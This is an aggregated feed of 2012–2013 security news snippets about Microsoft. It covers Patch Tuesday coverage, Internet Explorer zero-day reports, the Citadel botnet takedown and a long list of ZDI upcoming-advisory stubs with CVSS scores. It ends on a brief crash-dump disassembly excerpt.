==> REVIEW: “Security and Privacy for Microsoft Office 2010 Users”, Mitch Tulloch

http://blogs.securiteam.com/index.php/feed/ BKSCPRO2.RVW 20121122 “Security and Privacy for Microsoft Office 2010 Users”, Mitch Tulloch, 2012, 0735668833, U$9.99 %A Mitch Tulloch info@mtit.com www.mtit.com %C 1 Microsoft Way, Redmond, WA 98052-6399 %D 2012 %G 0735668833 %I Microsoft Press %O U$9.99 800-MSPRESS fax: 206-936-7329 mspinput@microsoft.com %O http://www.amazon.com/exec/obidos/ASIN/0735668833/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0735668833/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0735668833/robsladesin03-20 %O Audience n- Tech 1 Writing 1 (see revfaq.htm for [...]

==> Happy pack#1. I know what you installed last summer

http://blog.wintercore.com/?feed=rss2 It's really frustrating not to know what applications, patches, hotfixes (virtually any file)... are installed on the system where you are performing a penetration test, isn't it? I have decided to put up for sale, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain [...]

==> Microsoft, with help from feds, delivers body bleep to massive fraud ring

http://feeds.arstechnica.com/arstechnica/security?format=xml Massive online fraud syndicate that targeted online bank accounts disrupted.

==> Think your Skype messages get end-to-end encryption? Think again

http://feeds.arstechnica.com/arstechnica/security?format=xml Ars catches Microsoft accessing links we sent in our test messages.

==> Microsoft Citadel takedown ultimately counterproductive

http://feeds.feedburner.com/HelpNetSecurity Last week's disruption of nearly 1500 Citadel botnets believed to be responsible for over half a billion US dollars in financial fraud and affecting more than five million people in 90 countries has b...

==> The future of online authentication

http://feeds.feedburner.com/HelpNetSecurity Recently, Twitter has introduced 2-factor authentication, the latest in a long list of large-scale web services that have taken this step, including Google, Microsoft and Dropbox. Why have these organ...

==> ZDI-CAN-1909: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Jose A. Vazquez of Yenteasy - Security Research - ' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release

==> ZDI-CAN-1907: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Peter 'corelanc0d3r' Van Eeckhoutte - Corelan - www.corelangcv.com' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1893: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Arthur Gerkis' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1882: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'ZombiE' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1877: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1737: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1873: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.2 (AV:L/AC:H/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1867: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) severity vulnerability discovered by 'Arthur Gerkis' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1863: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Jose A. Vazquez of Yenteasy - Security Research - ' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1861: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Peter 'corelanc0d3r' Van Eeckhoutte' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1859: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1858: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Jose A. Vazquez of Yenteasy - Security Research - ' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1856: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by '80ceb6400c43bd3fa9f1ef561f7c51d929fe0199' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a

==> ZDI-CAN-1854: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1848: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1847: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van aka @__suto' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1843: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Bluesea' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1842: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van aka @__suto' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1841: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van aka @__suto' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1839: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair and Amol Naik' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1838: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1837: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Bluesea' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1805: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1799: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1781: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1822: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair and Amol Naik' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1819: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1818: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Simon Zuckerbraun' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1814: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1808: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1806: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1803: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1800: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair and Amol Naik' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1796: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Stephen Fewer of Harmony Security (www.harmonysecurity.com)' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1711: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1682: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1789: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair' was reported to the affected vendor on: 2013-03-22, 80 days ago. The vendor is given until 2013-09-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1786: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1754: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1771: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1770: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1769: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1753: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1720: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-02-04, 126 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1709: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-02-04, 126 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1592: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'FuzzMyApp' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1691: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-20, 202 days ago. The vendor is given until 2013-05-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1604: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher' and ' Microsoft & Paul Bates' and ' Microsoft' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will

==> ZDI-CAN-1651: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-08, 214 days ago. The vendor is given until 2013-05-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Attention shoppers: Patch IE now before you shop online

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Today is the eleventh Patch Tuesday of 2012, but the first since the official launch of Windows 8 and Windows RT. There are six new security bulletins, a couple of which are particularly urgent, especially for anyone planning to do any online shopping this holiday season. There are four security bulletins rated as Critical, one Important, and one Moderate. The Critical security bulletins address issues with Internet Explorer, Windows kernel-mode drivers, the .NET framework, and flaws in Windows shell code that can allow remote exploits. The most crucial of the six security bulletins is the cumulative update for Internet Explorer, MS12-071. Andrew Storms, director of security operations for nCircle, declares, "Topping our 'patch immediately' list this month is the drive-by exploit affecting Internet Explorer 9. It's fairly obvious that Microsoft patched this bug in IE10 before its release; otherwise, we would have a bulletin affecting both IE9 and IE10."

==> Windows 8 raises the bar for PC security

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Windows 8 is officially here. Microsoft held an event in New York yesterday to launch the new OS, and spent a lot of time talking about cool features and introducing a plethora of hardware options available with Windows 8. One thing Microsoft didn't talk about much, though, is security, and the new features in Windows 8 that will keep your PC and data safe. As with every previous iteration of the Windows operating system, Windows 8 is the most secure version yet. That really goes without saying, and amounts to little more than marketing hype. Each new version includes the security features of the previous one, but improves on them and adds new features to address potential risks missed by the predecessor. Not to suggest that Windows 8 is invulnerable, but it should be expected that it's more secure than Windows 7, or any previous version of Windows. Windows 8 includes a number of features that make it more secure than Windows 7. So, what makes Windows 8 more secure? Perhaps the biggest security feature of Windows 8 is really not a Microsoft or Windows 8 thing at all: UEFI (Unified Extensible Firmware Interface). UEFI is an open standard used to replace the archaic BIOS typically found on PC hardware.

==> Kaspersky Lab announces a brand-new OS focused on security

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The past two years or so have brought a new breed of scary malware to the forefront of public attention, including the infamous Stuxnet worm that was discovered back in 2010. Following hard on Stuxnet's proverbial heels, of course, were Duqu, Flame, Gauss, Shamoon, and Wiper, to name just a few examples. These new threats are generally thought to be state-sponsored in many cases and developed for cyberespionage against specific targets; another factor in common is that they tend to work through Microsoft Windows. It's long been known that Linux offers numerous security advantages over both Windows and Macs, of course, but security research firm Kaspersky Lab--which played a key role in identifying many of these frightening pieces of malware--apparently has other ideas.

==> Microsoft plans patch for critical flaw in Word next Tuesday

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It's the first Thursday of October. Do you know what happens on the first Thursday of each month? Microsoft provides an advance notification of the security bulletins it plans to release on the second Tuesday of the month, more commonly known as Patch Tuesday. Following an unusually light Patch Tuesday in September, Microsoft was forced to deal with the specter of a zero-day exploit being used in the wild to attack Internet Explorer. Microsoft responded with an out-of-band patch reflecting the urgent nature of the threat. IT admins will be a little busier in October. According to the Microsoft Security Bulletin Advance Notification for October 2012, Microsoft has a total of seven new security bulletins slated for release next week. Six of the seven are rated merely as Important, while the seventh, a patch for a flaw affecting all supported versions of Microsoft Word, is rated as Critical for Word 2010.

==> Microsoft pushes out critical security updates for Internet Explorer

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft has published an out-of-band security bulletin, MS12-063, to address a vulnerability that is being actively exploited in attacks in the wild. In addition, Microsoft also released an update to resolve a critical flaw in Adobe Flash in Internet Explorer 10, which is the default browser in Windows 8 and Windows Server 2012. Microsoft has responded quickly in its investigation of reports that a zero-day vulnerability in Internet Explorer is being actively exploited. Microsoft issued a security advisory with workarounds, and mitigating factors to help customers guard against attacks pending a fix. Then, it released a one-click Fix-It tool to protect customers while kicking its developers into high gear to create a more permanent fix. Microsoft squashes some bugs in Internet Explorer with new patches released today. Andrew Storms, director of security operations for nCircle, praised Microsoft's quick turnaround, but he also feels there is more on the line than just protecting customers from attacks. "Microsoft had to respond very quickly to this bug. In addition to the serious security threats it posed to their customers, Internet Explorer's market share is at risk. Many security pundits and organizations have been telling users to switch browsers until a patch is available. I'm sure that got the attention of a lot of Microsoft executives."

==> What you need to know about the Internet Explorer zero-day attacks

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft has confirmed reports that a zero-day vulnerability in its Internet Explorer Web browser is being actively attacked in the wild. While Microsoft works diligently to crank out a patch, it's important for businesses and consumers to understand the threat, and the steps that can be taken to avoid compromise while you wait. Microsoft has published a security advisory acknowledging the threat. According to Microsoft, the zero-day exploit affects Internet Explorer 7, 8, 9. Internet Explorer 10 is not impacted, but it's not completely safe because it remains vulnerable to flaws in the embedded Adobe Flash. The Microsoft advisory includes some tips that can be used to defend against this threat pending a patch for the underlying flaw. Microsoft recommends that customers use the Enhanced Mitigation Experience Toolkit (EMET) to implement mitigations that can prevent the zero-day exploit from working. In addition, Microsoft advises customers to set the Internet and local intranet security zone in Internet Explorer to High to block ActiveX controls and Active Scripting from running, or at least configure it to prompt before executing. Andrew Storms, director of security operations for nCircle, puts the threat in perspective. "If your systems are running IE, you are at risk, but don't panic. The reality is it's just one more zero-day and we've seen an awful lot of them come and go."

==> Microsoft confirms patch for Flash in IE10 coming soon

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Adobe recently issued an update for the popular Flash Player utility to patch critical flaws that could allow an attacker to run malicious code on the target system. But, if you're using Windows 8, the version of Flash that Microsoft has embedded in Internet Explorer 10 is still vulnerable. Good news, though: an update is forthcoming to address that problem. Adobe responds quickly to patch identified vulnerabilities, and most Windows users are conditioned to apply security updates as they're released, but Microsoft is responsible for updating Flash in its Web browser. Windows 8 hasn't yet officially launched, though, and Microsoft's initial response was that Flash would not be updated until after October 26 when Windows 8 becomes available to the general public. Microsoft baked Flash into IE10, so it's responsible for patching it. A couple of the flaws addressed by Adobe were given its highest threat warning level, and are associated with attacks that are already circulating in the wild. Last week, Adobe confirmed that Windows 8 users are still vulnerable to these threats. I asked Microsoft about speculation that a patch is imminent. Yunsun Wee, Director of Microsoft Trustworthy Computing, replied with this statement: "In light of Adobe's recently released security updates for its Flash Player, Microsoft is working closely with Adobe to release an update for Adobe Flash in IE10 to protect our mutual customers."

==> Get ready: Microsoft is raising the bar for encryption keys

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Great news! Next Tuesday is already Patch Tuesday for September, but Microsoft only has a couple of relatively minor updates lined up. Don't get too comfortable, though: you need to prepare for the changes Microsoft is making next month for cryptographic keys. Let's start with Patch Tuesday. September is a dramatic departure from previous months. Unlike the many months that have been loaded down with multiple Critical updates, or the fact that Internet Explorer has been updated monthly for the past few months, Microsoft only has two security bulletins scheduled for this month. Microsoft will soon consider any cryptographic key less than 1024 bits invalid. The last couple of months have each had nine new security bulletins, and the average per month through August is 7.5. Two is a manageable number that will make many IT admins very happy. Throw in the fact that both of the security bulletins are rated as Important, and that they impact software or platforms that many businesses don't even use, and some IT admins may essentially get this Patch Tuesday off free and clear. Of course, many IT admins are still trying to catch up from previous months, and can use the break to finish deploying the patches they already have. Then, there's the Java patch from Oracle that probably needs urgent attention if you haven't already implemented it.

==> Microsoft and Adobe Keep IT Busy with Critical Security Patches

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It's Patch Tuesday again. This month is busier than most because on top of Microsoft's security bulletins, Adobe is also releasing updates for Reader and Acrobat. Let's start with Microsoft. There are nine new security bulletins for August, which resolve 26 different vulnerabilities. There are five rated as Critical (including a patch for Internet Explorer for the third consecutive month) and four Important. Microsoft and Adobe released a barrage of new patches and updates. Tyler Reguly, director of security research and development for nCircle, says, "The most interesting thing this month is the release of patches for two wormable issues, MS12-053 and MS12-054. These only affect the oldest-supported Windows platforms and really speaks well of the improvements Microsoft has made to their security efforts over the years." Andrew Storms, director of security operations for nCircle, agrees with Reguly, stressing the potential impact of MS12-053. "This one has the potential for serious impact because it is network aware and no authentication is required. If you have XP on your network, then get the mitigations for this one installed ASAP."

==> Microsoft Rolls BlueHat Prize Finalist's Concept Into EMET 3.5

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft announced a new version of its EMET (Enhanced Mitigation Experience Toolkit) software at the Blackhat conference in Las Vegas. What's unique about the EMET 3.5 Technology Preview is that it includes new defenses inspired by one of Microsoft's BlueHat Prize finalists. EMET is a free utility from Microsoft that adds an extra layer of defense to prevent vulnerabilities from being successfully exploited. The software is a collection of tools and mitigation techniques that can be applied to protect against attacks. Guard against attacks with Microsoft's new EMET 3.5. One class of attacks that previous versions of EMET have not been armed to defend against effectively is Return Oriented Programming (ROP) attacks. Thanks to ROPGuard--a defense technology submitted for Microsoft's BlueHat contest--EMET 3.5 will have the tools available to defend against ROP attacks. "In less than three months, we successfully integrated one of the BlueHat Prize finalists technologies with EMET 3.5 Technology Preview to help make software significantly more resistant to exploitation," said Mike Reavey, senior director of the Microsoft Security Response Center at Microsoft, in a press release.

==> Patch Tuesday: Five critical bulletins, Exchange Server fix expected

http://feeds.pheedo.com/tt/1323 In addition to Exchange Server, updates fix flaws in Internet Explorer, Microsoft Office and Microsoft Word.

==> Operating System Choice Does Not Equal Security

http://hellnbak.wordpress.com/feed/ Yesterday while some of us in the USA were enjoying a day off Google made the news with this article in the Financial Times stating that they are moving away from Microsoft Windows due to security concerns. My first reaction was to question why a company with as many smart brains as Google would make such [...]

==> Interesting Information Security Bits for 11/03/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Microsoft: Trojans are huge and China is tops in browser exploits | Latest Security News – CNET News An interesting report has been put out by Microsoft that is worth a gander. Google patches […]

==> Cross Your T's and Dot Your Filenames

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was developing some automation code recently and found that a process that I was injecting code into was crashing. At first I thought it was an error in my injected code, but when I looked at the crash-dump, I was amazed to see that the issue was in MFC42.DLL:

    MOV EBX,104
    PUSH EBX
    LEA EAX,DWORD PTR SS:[EBP+szBuffer]
    PUSH EAX
    PUSH DWORD PTR DS:[ESI+6C]
